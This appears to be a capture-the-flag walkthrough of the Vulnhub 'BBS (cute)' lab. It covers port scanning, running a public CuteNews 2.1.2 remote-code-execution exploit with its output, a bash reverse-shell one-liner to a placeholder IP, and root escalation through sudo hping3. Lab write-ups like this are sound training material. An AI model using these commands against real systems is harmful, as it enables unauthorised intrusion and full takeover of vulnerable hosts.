Vulnhub - BBS (cute) | 0xatom

You can find the machine there > BBS (cute)

Summary

This box is a really easy but is really really good for beginners. Teach you the importance of exploit editing. We start by finding a vulnerable version of cutenews we edit the exploit and we gain command execution, privesc to root is simple we just exploit hping3. Let’s pwn it!

Enumeration/Reconnaissance

Let’s start as always with nmap.

$ ip=192.168.1.18
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 12:47 EEST
Nmap scan report for cute.htb.zte.com.cn (192.168.1.18)
Host is up (0.00046s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
88/tcp  open  kerberos-sec
110/tcp open  pop3
995/tcp open  pop3s
MAC Address: 08:00:27:3E:4A:A5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds
$ nmap -p 22,80,88,110,995 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 12:48 EEST
Nmap scan report for cute.htb.zte.com.cn (192.168.1.18)
Host is up (0.00035s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
88/tcp  open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) LOGIN-DELAY(10) TOP UIDL PIPELINING STLS USER
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) LOGIN-DELAY(10) TOP UIDL UTF8(USER) PIPELINING USER
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06

We start by enumerating the port 80, we can see the default apache page. Let’s run a quick dirb scan.

$ dirb http://$ip/ -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Sep 24 12:53:27 2020
URL_BASE: http://192.168.1.18/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.18/ ----
==> DIRECTORY: http://192.168.1.18/core/                                                  
==> DIRECTORY: http://192.168.1.18/docs/                                                  
+ http://192.168.1.18/favicon.ico (CODE:200|SIZE:1150)                                    
+ http://192.168.1.18/index.html (CODE:200|SIZE:10701)                                    
+ http://192.168.1.18/index.php (CODE:200|SIZE:6175)

If we visit /index.php we can see the CuteNews login page:

In the end we can see the version:

Shell as www-data

Let’s search for possible exploits.

$ searchsploit cutenews 2.1.2
------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                                                      | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                                          | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                                              | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                                                            | php/webapps/48800.py
------------------------------------------------------------------------------------------------------------------ ---------------------------------

Perfect! let’s mirror the python one in our box.

$ searchsploit -m php/webapps/48800.py
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/Documents/vulnhub/bbs-cute/48800.py

If we try to run it we get an error:

$ python3 48800.py 

[->] Usage python3 expoit.py

Enter the URL> http://192.168.1.18/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================

We have to edit the exploit. Simply we have to remove every CuteNews from the URL:

Do this and save it, now let’s run it again and we can see we have command execution:

$ python3 48800.py                                                                                            

[->] Usage python3 expoit.py

Enter the URL> http://192.168.1.18/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================
[+] Registration successful with username: jiuVQZxLu2 and password: jiuVQZxLu2

=======================================================
Sending Payload
=======================================================
signature_key: 2f8c9b4da3b9fe958e83f6abe83e7edb-jiuVQZxLu2
signature_dsi: b0309d8b10b78e793dd52b31ec8bb678
logged in user: jiuVQZxLu2
============================
Dropping to a SHELL
============================

command > whoami
www-data

This shell isnt that good tho, let’s spawn a normal reverse shell:

command > bash -c 'bash -i >& /dev/tcp/$your_ip/5555 0>&1'

$ nc -lvp 5555
listening on [any] 5555 ...

www-data@cute:/var/www/html/uploads$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@cute:/var/www/html/uploads$ 

Shell as root

Now while doing the basic enumeration, sudo -l says we can run hping3 as root:

www-data@cute:/var/www/html/uploads$ sudo -l
Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3

We can join the interactive mode of hping3 just by running it with no options:

www-data@cute:/var/www/html/uploads$ sudo hping3
hping3> whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
hping3> bash -i
root@cute:/var/www/html/uploads# 

Let’s read the flag:

root@cute:~# cat root.txt
0b18032c2d06d9e738ede9bc24795ff2

I love such boxes! :D